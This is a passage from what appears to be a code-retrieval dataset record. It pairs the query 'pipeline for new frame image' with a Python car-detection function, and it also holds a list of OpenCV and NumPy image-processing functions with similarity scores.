np.dstack((masked_edge, masked_edge, masked_edge)) \n \n # Draw the lines on the edge image\n lines_edges = cv2.addWeighted(color_edges, 0.4, line_image, 1, 0) \n #plt.imshow(lines_edges)\n #plt.show()\n return lines_edges", "def global_analysis(tomo, b_th, c=18):\n\n ## Thesholding and Volume analysis\n if c == 6:\n con_mat = [ [[0, 0, 0], [0, 1, 0], [0, 0, 0]],\n [[0, 1, 0], [1, 1, 1], [0, 1, 0]],\n [[0, 0, 0], [0, 1, 0], [0, 0, 0]] ]\n elif c == 18:\n con_mat = [[[0, 1, 0], [1, 1, 1], [0, 1, 0]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[0, 1, 0], [1, 1, 1], [0, 1, 0]]]\n elif c == 26:\n con_mat = [[[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]],\n [[1, 1, 1], [1, 1, 1], [1, 1, 1]]]\n else:\n raise ValueError\n tomo_lbl, num_lbls = sp.ndimage.label(tomo >= b_th, structure=np.ones(shape=[3, 3, 3]))\n tomo_out = np.zeros(shape=tomo.shape, dtype=int)\n lut = np.zeros(shape=num_lbls+1, dtype=int)\n\n ## COUNTING REGIONS METHODS\n # import time\n # hold_t = time.time()\n # for lbl in range(1, num_lbls + 1):\n # ids = tomo == lbl\n # feat_sz = len(ids)\n # tomo_out[ids] = feat_sz\n # # print('[1]:', lbl, 'of', num_lbls)\n # print time.time() - hold_t\n\n ## COUNTING PIXELS METHOD\n ## Count loop\n # cont, total = 0, np.prod(tomo.shape)\n # import time\n # hold_t = time.time()\n for x in range(tomo.shape[0]):\n for y in range(tomo.shape[1]):\n for z in range(tomo.shape[2]):\n id = tomo_lbl[x, y, z]\n lut[id] += 1\n # cont += 1\n # print('[1]:', cont, 'of', total)\n #\n ## Write loop\n # cont, total = 0, np.prod(tomo.shape)\n\n for x in range(tomo.shape[0]):\n for y in range(tomo.shape[1]):\n for z in range(tomo.shape[2]):\n id = tomo_lbl[x, y, z]\n if id > 0:\n tomo_out[x, y, z] = lut[id]\n # cont += 1\n # print('[1]:', cont, 'of', total)\n # print time.time() - hold_t\n\n return tomo_out", "def get_dark_images(new_path, dataframe):\n\n image_list = [i for i in dataframe['image']]\n return [1 if np.mean(np.array(Image.open(new_path + image))) == 0 else 0 for image in image_list]", "def detect_labels(img: np.ndarray):\n \n # Create a range of allowed colors.\n lower_color = np.array([20, 50, 0])\n upper_color = np.array([255, 255, 255])\n\n # Keep the pixels that lie within the range.\n color_filtered = cv.inRange(\n cv.cvtColor(img, cv.COLOR_RGB2HSV),\n lower_color,\n upper_color\n )\n \n # Keeping only the really bright pixels (converted to 255), change the dull ones to 0.\n # Helps distinguish the labels from other dull colors.\n _, thresholded = cv.threshold(color_filtered, 254, 255, cv.THRESH_BINARY)\n\n # Reduce the thickness of regions. 
Every 30x30 sliding window of 255 in the image gets replaced by a white pixel.\n # The stronger the erosion, the more the noise is removed, with a chance of removal of good pixels as well.\n eroded = cv.erode(thresholded, np.ones((30, 30)))\n\n # Now find outlines of the bright regions that remain after the thickness reduction.\n contours, _ = cv.findContours(eroded, cv.RETR_TREE, cv.CHAIN_APPROX_SIMPLE)\n \n # Identify the contours that represent our labels.\n # Gotta be the two largest ones in terms of area.\n contour_areas = [(cv.contourArea(c), idx) for (idx, c) in enumerate(contours)]\n\n contour_largest_idx = max(contour_areas)[1]\n contour_second_largest_idx = max(filter(lambda item: item[1] != contour_largest_idx, contour_areas))[1]\n\n # Since the labels are sorta rectangular, find the mean of the contours' y-axes to approximate the vertical center of the labels.\n largest_vertical_center = np.mean(contours[contour_largest_idx][:, :, 1])\n second_largest_vertical_center = np.mean(contours[contour_second_largest_idx][:, :, 1])\n\n # Higher center implies the value is more towards the bottom of the image, and hence the vertical center of the bottom label.\n bottom_label = min(largest_vertical_center, second_largest_vertical_center)\n \n # Lower center implies the value is more towards the top of the image, and hence the vertical center of the top label.\n top_label = max(largest_vertical_center, second_largest_vertical_center)\n\n return bottom_label, top_label", "def find_buoy(img, display_results=False):\n\n greyscale_image = cv2.cvtColor(img.astype(np.uint8), cv2.COLOR_GRAY2BGR)\n cm_image = cv2.applyColorMap(greyscale_image, cv2.COLORMAP_VIRIDIS)\n\n cm_copy_image = cm_image\n cv2.copyTo(cm_image, cm_copy_image)\n cm_image = cv2.medianBlur(cm_image, 5) # Removes salt and pepper noise\n\n mask = mask_sonar_image(cm_image, display_results)\n\n cm_circs = cv2.findContours(mask, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)[-2]\n cm_circs = list(filter(lambda x: (cv2.contourArea(x) > 250), cm_circs))\n\n cm_circs = sorted(cm_circs, key=lambda x: (cv2.arcLength(x, True)**2/(\n 4*math.pi*cv2.contourArea(x))), reverse=False)\n\n filtered_circles = cm_circs[0:1]\n\n circle_positions = []\n for circle in filtered_circles: # Find center of circle code\n M = cv2.moments(circle)\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n circle_positions.append((cX, cY, (cv2.arcLength(circle, True)**2/(\n 4*math.pi*cv2.contourArea(circle))),\n cv2.contourArea(circle)))\n\n if display_results:\n cv2.drawContours(cm_copy_image, filtered_circles, -1, (0, 255, 0), 2)\n cv2.imshow(\"found_buoys\", cm_copy_image)\n cv2.waitKey(0)\n\n return circle_positions", "def on_image(image):\n objects = [obj for obj in coco.classify(image) if obj.confidence > config.OBJECT_CONFIDENCE_THRESHOLD]\n queue.put((image, objects))", "def run_visualization(image):\n original_im = Image.fromarray(image)\n seg_map = model.run(original_im)\n seg_image = label_to_color_image(seg_map).astype(np.uint8)\n\n return seg_image", "def check_image(self, image, temps):\n self.logger.debug('Check image \"%s\"', image)\n _, edges = cv2.threshold(cv2.imread(image, 0), 127, 255, cv2.THRESH_BINARY)\n\n result = []\n for filename in temps:\n template = cv2.imread(filename, 0)\n width, hight = template.shape[::-1]\n\n res = cv2.matchTemplate(edges, template, cv2.TM_CCORR_NORMED)\n if self.multi:\n for point in zip(*np.where(res >= self.threshold)[::-1]):\n result.append((point, (point[0] + width, point[1] + hight)))\n 
else:\n _, max_val, _, max_loc = cv2.minMaxLoc(res)\n if max_val > self.threshold:\n result.append((max_loc, (max_loc[0] + width, max_loc[1] + hight)))\n return result" ]
[ "0.7544776", "0.751789", "0.69776064", "0.68778455", "0.6797643", "0.6754273", "0.6741402", "0.6733516", "0.6707194", "0.669984", "0.66010076", "0.65580624", "0.65305924", "0.6255979", "0.6248127", "0.62139523", "0.6213312", "0.6186227", "0.6084384", "0.6077522", "0.6051025", "0.60180014", "0.6016718", "0.5978734", "0.59658897", "0.5949986", "0.58877367", "0.5875262", "0.58746266", "0.58679885", "0.583015", "0.58280647", "0.5818854", "0.581733", "0.5815878", "0.5794954", "0.57684135", "0.5733923", "0.5727015", "0.5721082", "0.5720878", "0.5713227", "0.5699824", "0.56929517", "0.56903875", "0.56770223", "0.5664665", "0.56470877", "0.5642082", "0.56085926", "0.5605678", "0.560171", "0.5601574", "0.55883205", "0.5575753", "0.55701905", "0.55618453", "0.555158", "0.5548128", "0.55449694", "0.55321765", "0.55206245", "0.5516395", "0.5514854", "0.5505338", "0.5502421", "0.5502127", "0.5495911", "0.5495591", "0.5492643", "0.5490653", "0.5482417", "0.547939", "0.54767305", "0.5474084", "0.5465627", "0.5451739", "0.5446285", "0.5446187", "0.5440735", "0.54403836", "0.54337716", "0.5432064", "0.54245454", "0.54218787", "0.5421751", "0.54176354", "0.54152966", "0.5415175", "0.54134166", "0.54077184", "0.54031795", "0.54025275", "0.5402527", "0.5396272", "0.5390581", "0.5381702", "0.53789", "0.537767", "0.5374618" ]
0.6223624
15
pipeline for new frame image
def process_image(self, img):
    show = False
    # draw_image = np.copy(img)
    # search all scale windows and return cars' windows
    hots = search_scales(img, self.svc, self.X_scaler, self.orient, self.pix_per_cell,
                         self.cell_per_block, self.spatial_size, self.hist_bins)
    # update the self boxes
    self.update(hots)
    # detect cars using threshold
    window_image = self.detect(img, 2)
    if show:
        plt.imshow(window_image)
        plt.show()
    return window_image
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def run_frame(self, image):\n self.frame_idx += 1\n # run main pipeline\n t0 = datetime.now()\n disp = self.main_pipeline(image)\n t1 = datetime.now()\n logging.info('main pipeline: {}'.format(get_tdiff(t0, t1)))\n \n # prepare image sequence of 3 for trajectory pipeline\n t0 = datetime.now()\n self.image_seq.append(image)\n if len(self.image_seq) > 3:\n del self.image_seq[0]\n t1 = datetime.now()\n logging.info('image stack: {}'.format(get_tdiff(t0, t1)))\n\n # run trajectory pipeline\n t0 = datetime.now()\n if len(self.image_seq) >= 3:\n self.egomo_trmat = self.traj_pipeline(prev_trmat=self.egomo_trmat)\n t1 = datetime.now()\n logging.info('traj pipeline: {}'.format(get_tdiff(t0, t1)))\n return self.frame_idx, disp, self.egomo_trmat, self.t_list", "def process(self, image):", "def transform(self, previousimage):", "def run_frame(self, ti, img):\n pass", "def gen():\n global dataFrame\n while True:\n frame = vs.read()\n # frame = imutils.resize(frame, width=400)\n \n (flag, encodedImage) = cv2.imencode(\".jpg\", frame.copy())\n if not flag: continue\n # print (encodedImage)\n dataFrame = yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + bytearray(encodedImage) + b'\\r\\n')", "def create_new_frame(image_file, green_file, process_file):\n\n # this print() statement is there to help see which frame is being processed\n print(f'{process_file[-7:-4]}', end=',', flush=True)\n\n image_img = Image.open(image_file)\n green_img = Image.open(green_file)\n\n # Make Numpy array\n np_img = np.array(green_img)\n\n # Mask pixels \n mask = (np_img[:, :, BLUE] < 120) & (np_img[:, :, GREEN] > 120) & (np_img[:, :, RED] < 120)\n\n # Create mask image\n mask_img = Image.fromarray((mask*255).astype(np.uint8))\n\n image_new = Image.composite(image_img, green_img, mask_img)\n image_new.save(process_file)", "def frame_pre_process(self, frame):\n assert len(frame.shape) == 3, \\\n \"Expected input frame in (H, W, C) format proposed\"\n assert frame.shape[2] in [3, 4], \\\n \"Expected BGR or BGRA input process\"\n # setup the frame in the original format\n \n #orig_image = frame.copy()\n original_image = frame.copy()\n \n # creating the frame transpose conversion\n frame = frame.transpose((2, 0, 1)) # Converting from HWC to CHW\n \n # creating the frame dimensions\n frame = np.expand_dims(frame, axis=0)\n \n # return the frames outcome\n return (frame)", "def create_frame_blob(self):\n # self.image_blob = cv2.dnn.blobFromImage(\n # cv2.resize(self.frame, (300, 300)), 1.0, (300, 300),\n # (104.0, 177.0, 123.0), swapRB=False, crop=False)\n self.image_blob = cv2.dnn.blobFromImage(cv2.resize(self.frame, (300, 300)),\n 0.007843, (300, 300), 127.5)", "def process_pipeline(frame, keep_state=True):\n\n global line_lt, line_rt, processed_frames\n\n # undistort the image using coefficients found in calibration\n undistorted_img = undistort(frame, mtx, dist)\n\n # binarize the frame and highlight lane lines\n binarized_img = binarize(undistorted_img)\n\n # perspective transform to obtain bird's eye view\n birdeye_img, matrix, inversed_matrix = birdeye(binarized_img, visualise=False)\n\n # 2 order polynomial curve fit onto lane lines found\n if processed_frames > 0 and keep_state and line_lt.detected and line_rt.detected:\n find_lane_by_previous_fits(birdeye_img, line_lt, line_rt, visualise=False)\n else:\n find_lane_by_sliding_windows(birdeye_img, line_lt, line_rt, n_windows=9, visualise=False)\n\n # compute offset in meter from center of the lane\n offset_meter = offset_from_lane_center(line_lt, line_rt, 
frame_width=frame.shape[1])\n\n # draw the surface enclosed by lane lines back onto the original frame\n blend_on_road = draw_back_onto_the_road(undistorted_img, inversed_matrix, line_lt, line_rt, keep_state)\n mean_curvature_meter = np.mean([line_lt.curvature_meter, line_rt.curvature_meter])\n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.putText(blend_on_road, 'Curvature radius: {:.02f}m'.format(mean_curvature_meter), (60, 60), font, 1,\n (255, 255, 255), 2)\n cv2.putText(blend_on_road, 'Offset from center: {:.02f}m'.format(offset_meter), (60, 90), font, 1,\n (255, 255, 255), 2)\n\n processed_frames += 1\n\n return blend_on_road", "def run_record(self, state, pipeline, record_path):\n e1 = cv2.getTickCount()\n while state.record_btn:\n # Wait for a coherent pair of frames: depth and color\n frames = pipeline.wait_for_frames()\n depth_frame = frames.get_depth_frame()\n color_frame = frames.get_color_frame()\n if not depth_frame or not color_frame:\n continue\n \n # filter\n depth_frame = self.th_filter.process(depth_frame)\n depth_frame = self.sp_filter.process(depth_frame)\n depth_frame = self.tmp_filter.process(depth_frame)\n\n depth_colormap = self.colorizer.colorize(depth_frame)\n # Convert images to numpy arrays\n depth_image = np.asanyarray(depth_colormap.get_data())\n color_image = np.asanyarray(color_frame.get_data())\n\n lane_masked = self.lane_detector.detect(color_image)\n # Show images\n stacked_imgs = (color_image, depth_image, lane_masked)\n images = np.hstack(stacked_imgs)\n cv2.resizeWindow(state.WIN_NAME, \n self.width*len(stacked_imgs), \n self.height)\n cv2.imshow(state.WIN_NAME, images)\n cv2.setMouseCallback(state.WIN_NAME, state.mouse_controll)\n key = cv2.waitKey(1)\n if key == 27:\n state.app_btn = False\n state.record_btn = False\n break\n # Calculate Runtime Tick to quit\n e2 = cv2.getTickCount()\n tick = int((e2 - e1) / cv2.getTickFrequency())\n # Save images per tick\n if self.saveimg:\n color_file = record_path / f\"color-{tick}.npy\"\n depth_file = record_path / f\"depth-{tick}.npy\"\n ps_file = record_path / f\"ps-{tick}.ply\"\n if not ps_file.exists():\n np.save(color_file, color_image)\n np.save(depth_file, depth_image)\n \n # Create point cloud\n if self.savepc and (not ps_file.exists()):\n points = self.pc.calculate(depth_frame)\n self.pc.map_to(depth_frame)\n points.export_to_ply(str(ps_file), color_frame)\n\n if tick > self.record_time:\n print(\"Finish Record\")\n state.app_btn = False\n state.record_btn = False\n cv2.destroyAllWindows()\n break\n\n if not state.app_btn:\n break", "def SIMPLEST_PIPELINE():\n return lambda image_path, label: (\n tf.image.decode_jpeg(tf.io.read_file(image_path), channels=3),\n label\n )", "def __call__(self, frame_num):\n # propagate and set the density\n self.img.set_array(\n np.abs(self.quant_sys.propagate(10)) ** 2\n )\n return self.img,", "def gen_frame():\n while True:\n frame = camera_stream()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/png\\r\\n\\r\\n' + frame + b'\\r\\n') # concate frame one by one and show result", "def process(image):\n pass", "def frameProcessing():\n\tglobal referenceFrame\n\tglobal dilatedFrame\n\t#receive the image from the request.\n\tfile = request.json\n\tframe = np.array(file[\"Frame\"], dtype = \"uint8\")\n\t\n\t#gray-scale conversion and Gaussian blur filter applying\n\tgrayFrame = greyScaleConversion(frame)\n\tblurredFrame = gaussianBlurring(grayFrame)\n\n\t#Check if a frame has been previously processed and set it as the previous frame.\n\tif type(referenceFrame) 
==int():\n\t\treferenceFrame = blurredFrame\n\t\n\t#Background subtraction and image binarization\n\tframeDelta = getImageDiff(referenceFrame, blurredFrame)\n\treferenceFrame = blurredFrame\n\t#cv2.imwrite(\"previousImage.jpg\", blurredFrame)\n\tframeThresh = thresholdImage(frameDelta, binarizationThreshold)\n\n\t#Dilate image and find all the contours\n\tdilatedFrame = dilateImage(frameThresh)\n\t#cv2.imwrite(\"dilatedFrame.jpg\", dilatedFrame)\n\tcnts = getContours(dilatedFrame.copy())\n\t\n\theight = np.size(frame,0)\n\tcoordYEntranceLine = int((height / 2)-offsetEntranceLine)\n\tcoordYExitLine = int((height / 2)+offsetExitLine)\n\theaders = {\"enctype\" : \"multipart/form-data\"}\n\tr = requests.post(\"http://\" + getNextServer() + \"/objectClassifier\", headers = headers, json = {\"Frame\":frame.tolist()} )\n\t\"\"\"\t\n\tfor c in cnts:\n\t\tprint(\"x\")\n\t\tif cv2.contourArea(c) < minContourArea:\n\t\t\tprint(\"Small Area\", cv2.contourArea(c))\n\t\t\tcontinue\n\t\t(x, y, w, h) = getContourBound(c)\n\t\t#grab an area 2 times larger than the contour.\n\t\tcntImage = frame[y:y+int(1.5*w), x:x+int(1.5*h)]\n\t\tobjectCentroid = getContourCentroid(x, y, w, h)\n\t\tcoordYCentroid = (y+y+h)/2\n\t\t\n\t\t\n\t\t#if (checkEntranceLineCrossing(coordYCentroid,coordYEntranceLine,coordYExitLine)):\t\t\t\t\n\t\theaders = {\"enctype\" : \"multipart/form-data\"}\n\t\t#i = random.randint(1,1000)\n\t\t#cv2.imwrite(\"ContourImages/contour\"+str(i)+\".jpg\", cntImage)\n\t\t#files = {\"image\":open(\"ContourImages/contour\"+str(i)+\".jpg\", \"rb\")}\n\t\tdata = {\"contour\" : cntImage.tolist()}\n\t\tr = requests.post(\"http://\" + getNextServer() + \"/objectClassifier\", headers = headers, json = data )\n\n\t\n\t\"\"\"\n\treturn Response(status=200)", "def write_frame(self, img):\n if img.shape[0] % 2 != 0:\n print(\"Warning: height is not divisible by 2! Dropping last row\")\n img = img[:-1]\n if img.shape[1] % 2 != 0:\n print(\"Warning: width is not divisible by 2! 
Dropping last column\")\n img = img[:, :-1]\n if self.post_processor:\n img = self.post_processor.process(img)\n if self.width is None:\n self.width = img.shape[0]\n self.height = img.shape[1]\n assert os.path.exists(self.directory)\n fn = FRAME_FN_TEMPLATE % self.frame_counter\n self.frame_fns.append(fn)\n imwrite(img, os.path.join(self.frame_directory, fn))\n self.frame_counter += 1\n if self.frame_counter % self.next_video_checkpoint == 0:\n if self.automatic_build:\n self.make_video()\n self.next_video_checkpoint *= 2", "def _create_vtk_pipeline(self):\n if self._viewer is None and not self._view_frame is None:\n \n if True:\n self._viewer = vtk.vtkImageViewer2()\n self._viewer.SetupInteractor(self._view_frame._rwi)\n self._viewer.GetRenderer().SetBackground(0.3,0.3,0.3)\n \n else:\n ren = vtk.vtkRenderer()\n self._view_frame._rwi.GetRenderWindow().AddRenderer(ren)", "def process_frame(self, frame):\n\t\treturn frame", "def gen(camera):\n while True:\n # frame_findline = camera.get_frame()\n frame_findline, center_Pos1, center_Pos2 = camera.get_frame()\n frame_findline = cv2.line(frame_findline, (center_Pos1, 440), (center_Pos2, 380), (255,100,0), 5)\n\n frame = cv2.imencode('.jpg', frame_findline)[1].tobytes()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def _prepare_frame(self, frame):\n\n initial_h, initial_w = frame.shape[:2]\n scale_h, scale_w = initial_h / float(self.input_height), initial_w / float(self.input_width)\n\n in_frame = cv2.resize(frame, (self.input_width, self.input_height))\n in_frame = in_frame.transpose((2, 0, 1))\n in_frame = in_frame.reshape(self.input_size)\n\n return in_frame, scale_h, scale_w", "def process_image(self):\n pass", "def image_processing(eye_frame, threshold):\n kernel = np.ones((3, 3), np.uint8)\n new_frame = cv2.bilateralFilter(eye_frame, 10, 15, 15)\n new_frame = cv2.erode(new_frame, kernel, iterations=3)\n new_frame = cv2.threshold(new_frame, threshold, 255, cv2.THRESH_BINARY)[1]\n\n return new_frame", "def _create_pipeline(self) -> TfmIterator:\n # 1. Initialise TubRecord -> x, y transformations\n def get_x(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting x from record for training\"\"\"\n out_dict = self.model.x_transform(record, self.image_processor)\n # apply the normalisation here on the fly to go from uint8 -> float\n out_dict['img_in'] = normalize_image(out_dict['img_in'])\n return out_dict\n\n def get_y(record: TubRecord) -> Dict[str, Union[float, np.ndarray]]:\n \"\"\" Extracting y from record for training \"\"\"\n y = self.model.y_transform(record)\n return y\n\n # 2. 
Build pipeline using the transformations\n pipeline = self.sequence.build_pipeline(x_transform=get_x,\n y_transform=get_y)\n return pipeline", "def captureNextFrame(self):\r\n mainls = []\r\n\r\n\r\n ret, readFrame = self.capture.read()\r\n\r\n if (ret == True):\r\n self.currentFrame = cv2.cvtColor(readFrame, cv2.COLOR_BGR2RGB)\r\n self.faceDetection(self.currentFrame)\r\n self.currentFrame = self.bbFrame", "def pipeline(image):\n # undistort image\n undistorted_image = undistort_image(image)\n superimposed_image = find_lanes(undistorted_image)\n labels = find_vehicles(undistorted_image)\n\n draw_img = draw_labeled_bboxes(superimposed_image, labels)\n\n \n return draw_img", "def extract_frames(pipe, \r\n cfg, \r\n save_path,\r\n post_processing=False,\r\n save_colorize=True,\r\n save_pc=False,\r\n visualize=True):\r\n # Configurations\r\n if save_colorize:\r\n colorizer = rs.colorizer()\r\n if save_pc:\r\n pc = rs.pointcloud()\r\n points = rs.points()\r\n # Save path\r\n if not os.path.exists(save_path):\r\n os.makedirs(save_path)\r\n\r\n # Start the pipe\r\n i = 0\r\n profile = pipe.start(cfg)\r\n device = profile.get_device()\r\n playback = device.as_playback()\r\n playback.set_real_time(False) # Make sure this is False or frames get dropped\r\n while True:\r\n try:\r\n # Wait for a conherent pairs of frames: (rgb, depth)\r\n pairs = pipe.wait_for_frames()\r\n\r\n # Align depth image to rgb image first\r\n align = rs.align(rs.stream.color)\r\n pairs = align.process(pairs)\r\n\r\n color_frame = pairs.get_color_frame()\r\n depth_frame = pairs.get_depth_frame()\r\n if not depth_frame or not color_frame:\r\n continue\r\n\r\n # Post-processing\r\n if post_processing:\r\n depth_frame = post_processing(depth_frame)\r\n\r\n # Get rgb-d images\r\n color_img = np.asanyarray(color_frame.get_data())\r\n color_img = cv2.cvtColor(color_img, cv2.COLOR_RGB2BGR)\r\n depth_img = np.asanyarray(depth_frame.get_data())\r\n print('Frame {}, Depth Image {}, Color Image {}'.format(i+1, depth_img.shape, color_img.shape))\r\n \r\n # Save as loseless formats\r\n cv2.imwrite(os.path.join(save_path, '{}_rgb.png'.format(i)), color_img, [cv2.IMWRITE_PNG_COMPRESSION, 0])\r\n np.save(os.path.join(save_path, '{}_depth.npy'.format(i)), depth_img)\r\n \r\n if save_colorize:\r\n # Save colorized depth map\r\n depth_img_colorized = np.asanyarray(colorizer.colorize(depth_frame).get_data())\r\n cv2.imwrite(os.path.join(save_path, '{}_depth_colorized.jpg'.format(i)), depth_img_colorized) # No need for lossless here\r\n \r\n if save_pc:\r\n # NOTE: Point cloud calculation takes longer time.\r\n pc.map_to(color_frame)\r\n points = pc.calculate(depth_frame)\r\n points.export_to_ply(os.path.join(save_path, '{}_pc.ply'.format(i)), color_frame)\r\n \r\n i += 1\r\n\r\n if visualize:\r\n # Stack both images horizontally\r\n images = np.vstack((color_img, depth_img_colorized))\r\n\r\n # Show images\r\n cv2.namedWindow('RealSense', cv2.WINDOW_NORMAL)\r\n cv2.imshow('RealSense', images)\r\n cv2.waitKey(1)\r\n \r\n except Exception as e:\r\n print(e)\r\n break\r\n\r\n # Clean pipeline\r\n pipe.stop()\r\n print('{} frames saved in total.'.format(i))\r\n\r\n return", "def get_image(self):\n self.flush_buffer()\n _, frame = self.cam.read()\n shift_frame = self.perspective_shift(frame)\n #shift_frame = None\n return frame, shift_frame", "def update_frame(self, frame):\n\n t = datetime.now()\n delta_t = t - self.dpar.frame_timestamp[0]\n fps = self.dpar.update_fps(1./delta_t.total_seconds())\n\n self.dpar.frame_timestamp[0] = t\n\n if 
self.config.black_correct:\n cframe = self.ffc.black_correct(frame)\n else:\n cframe = frame\n\n self.dpar.latest_frame = np.copy(cframe)\n \n if self.dpar.cap_live_swap:\n pix, gray = self._get_pixmap(cframe[::4,::4], self.dpar.iwindow[0])\n self.cap_screen.cap_title = self._live_title(fps)\n self.cap_screen.setPixmap(pix)\n else: \n pix, gray = self._get_pixmap(cframe, self.dpar.iwindow[0])\n self.live_screen.live_title = self._live_title(fps)\n self.live_screen.setPixmap(pix)\n\n self.draw_histogram()\n\n\n if self.recording_sequence:\n\n # MRP ToDo update these tags properly.\n et = np.int(np.round(self.camera.actual_exposure_time_ms))\n ifi_ms = 1000. / self.camera.actual_frame_rate\n ts_ms = np.int(np.round(ifi_ms * self.seq_frame_num))\n\n self.ifd.update_tags((self.seq_frame_num, 0), et, 0, ts_ms, 99)\n\n cap_image = np.copy(self.dpar.latest_frame).astype(np.uint16)\n #cv2.imwrite(cfn, (cap_image << (16 - self.camera.pixel_bits)).astype(np.uint16))\n\n \"\"\"\n Perform the TIFF windowing and then rebinning (compress) according to config file options\n \"\"\"\n x0 = max(0, (cap_image.shape[1] - config.tiff_seq_x_window) // 2)\n x1 = cap_image.shape[1] - x0\n y0 = max(0, (cap_image.shape[0] - config.tiff_seq_y_window) // 2)\n y1 = cap_image.shape[0] - y0\n cap_image = cap_image[y0:y1, x0:x1]\n\n shift_bits = 16 - self.camera.pixel_bits\n if config.tiff_seq_rebin > 1: # not tested for r ne 2\n r = config.tiff_seq_rebin\n cap_image = cap_image.reshape((cap_image.shape[0] // r, r, cap_image.shape[1] // r, -1)).sum(axis=3).sum(axis=1)\n extra_bits = 2 * (r.bit_length() -1)\n shift_bits = max(0, shift_bits - extra_bits)\n\n\n #im = PIL.Image.fromarray(gray)\n im = PIL.Image.fromarray((cap_image << shift_bits).astype(np.uint16))\n\n im.save(self.tiff_out, tiffinfo=self.ifd, compression=TIFF_COMPRESSION)\n self.tiff_out.newFrame()\n self.seq_frame_num += 1\n self.seq_frame_label.setText(str(self.seq_frame_num))\n\n if self.recording_video:\n # cframe is int16\n #f8 = ((cframe >> (self.camera.pixel_bits - 8)) & 0xff).astype(np.uint8)\n #Style 1:\n #fc = np.stack((f8, f8, f8), axis=-1)\n #self.rv_vout.write(fc)\n #Style 2&3:\n self.rv_vout.write(gray)\n self.recorded_video_frame_number += 1\n #Style 4: (16-bit)\n #self.rv_vout.write(cframe)\n\n #if self.recorded_video_frame_number == 20:\n # self.record_video() # turn off", "def __init__(self):\n self.active = True # Camera activation control\n self.stream = cv2.VideoCapture(0) # Open video stream\n while not self.stream.isOpened():\n pass\n _,self.image = self.stream.read()# Save the first frame\n cv2.waitKey(10)\n self.frame = self.image[196:304,:546,:]# Cropped frame\n self.diff_frame = self.frame\n# self.reference_frame = copy.deepcopy(self.frame)\n# self.abs_diff_frame = copy.deepcopy(self.frame)\n self.reference_frame = self.frame\n self.abs_diff_frame = self.frame\n self.frame_count = 1 # Used for framerate estimation\n self.frame_rate = 0\n self.tic = time()", "def processframe(pilimage):\n # TODO: Idea on of overfilling\n # [[0,0,0],\n # [1,1,1],\n # [0,0,0]]\n # Keep this as template. aka pattern. use scipy measure and that s pattern to match all connecting\n # this gets all the fills. 
the rest is thrown into the pile of sets.\n # we assume index 0 as discarded (Can't really do much with black images.)\n numpyarrayfrompil = numpy.array(pilimage)\n # First we pass to regionprops\n props = createfillers(numpyarrayfrompil)\n # pass all the data we need now to the mapprops2color\n # returns a string which can be cerealised.\n return mapprops2color(props, numpyarrayfrompil, pilimage)", "def make(self) -> None:\n\n # arbitrarily selecting the first image from the list, index 0\n with Image.open(self.image_list[0]) as first_frame_image_in_list:\n\n # Find the width and height of the first image of the list.\n # Assuming all the images have same size.\n frame_image_width, frame_image_height = first_frame_image_in_list.size\n\n # scale is the ratio of collage_image_width and product of\n # images_per_row_in_collage with frame_image_width.\n\n # The scale will always lie between 0 and 1, which implies that\n # the images are always going to get downsized.\n scale = (self.collage_image_width) / (\n self.images_per_row_in_collage * frame_image_width\n )\n\n # Calculating the scaled height and width for the frame image.\n scaled_frame_image_width = ceil(frame_image_width * scale)\n scaled_frame_image_height = ceil(frame_image_height * scale)\n\n # Divide the number of images by images_per_row_in_collage. The later\n # was calculated by taking the square root of total number of images.\n number_of_rows = ceil(self.number_of_images / self.images_per_row_in_collage)\n\n # Multiplying the height of one downsized image with number of rows.\n # Height of 1 downsized image is product of scale and frame_image_height\n # Total height is number of rows times the height of one downsized image.\n self.collage_image_height = ceil(scale * frame_image_height * number_of_rows)\n\n # Create an image of passed collage_image_width and calculated collage_image_height.\n # The downsized images will be pasted on this new base image.\n # The image is 0,0,0 RGB(black).\n collage_image = Image.new(\n \"RGB\", (self.collage_image_width, self.collage_image_height)\n )\n\n # keep track of the x and y coordinates of the resized frame images\n i, j = (0, 0)\n\n # iterate the frames and paste them on their position on the collage_image\n for count, frame_path in enumerate(self.image_list):\n\n # Set the x coordinate to zero if we are on the first column\n # If self.images_per_row_in_collage is 4\n # then 0,4,8 and so on should have their x coordinate as 0\n if (count % self.images_per_row_in_collage) == 0:\n i = 0\n\n # open the frame image, must open it to resize it using the thumbnail method\n frame = Image.open(frame_path)\n\n # scale the opened frame images\n frame.thumbnail(\n (scaled_frame_image_width, scaled_frame_image_height), Image.ANTIALIAS\n )\n\n # set the value of x to that of i's value.\n # i is set to 0 if we are on the first column.\n x = i\n\n # It ensures that y coordinate stays the same for any given row.\n # The floor of a real number is the largest integer that is less\n # than or equal to the number. 
floor division is used because of\n # the zero based indexing, the floor of the division stays same\n # for an entier row as the decimal values are negled by the floor.\n # for the first row the result of floor division is always zero and\n # the product of 0 with scaled_frame_image_height is also zero, they\n # y coordinate for the first row is 0.\n # For the second row the result of floor division is one and the prodcut\n # with scaled_frame_image_height ensures that the y coordinate is\n # scaled_frame_image_height below the first row.\n y = (j // self.images_per_row_in_collage) * scaled_frame_image_height\n\n # paste the frame image on the newly created base image(base image is black)\n collage_image.paste(frame, (x, y))\n frame.close()\n\n # increase the x coordinate by scaled_frame_image_width\n # to get the x coordinate of the next frame. unless the next image\n # will be on the very first column this will be the x coordinate.\n i = i + scaled_frame_image_width\n\n # increase the value of j by 1, this is to calculate the y coordinate of\n # next image. The increased number will be floor divided by images_per_row_in_collage\n # therefore the y coordinate stays the same for any given row.\n j += 1\n\n # save the base image with all the scaled frame images embeded on it.\n collage_image.save(self.output_path)\n collage_image.close()", "def __image_pipeline(self, img):\n \n ##### Lane finding pipeline #######\n resized = self.__resize_image(img)\n undistorted = self.__correct_distortion(resized)\n warped = self.__warp_image_to_biv(undistorted)\n thresholded = self.__threshold_image(warped)\n lines = 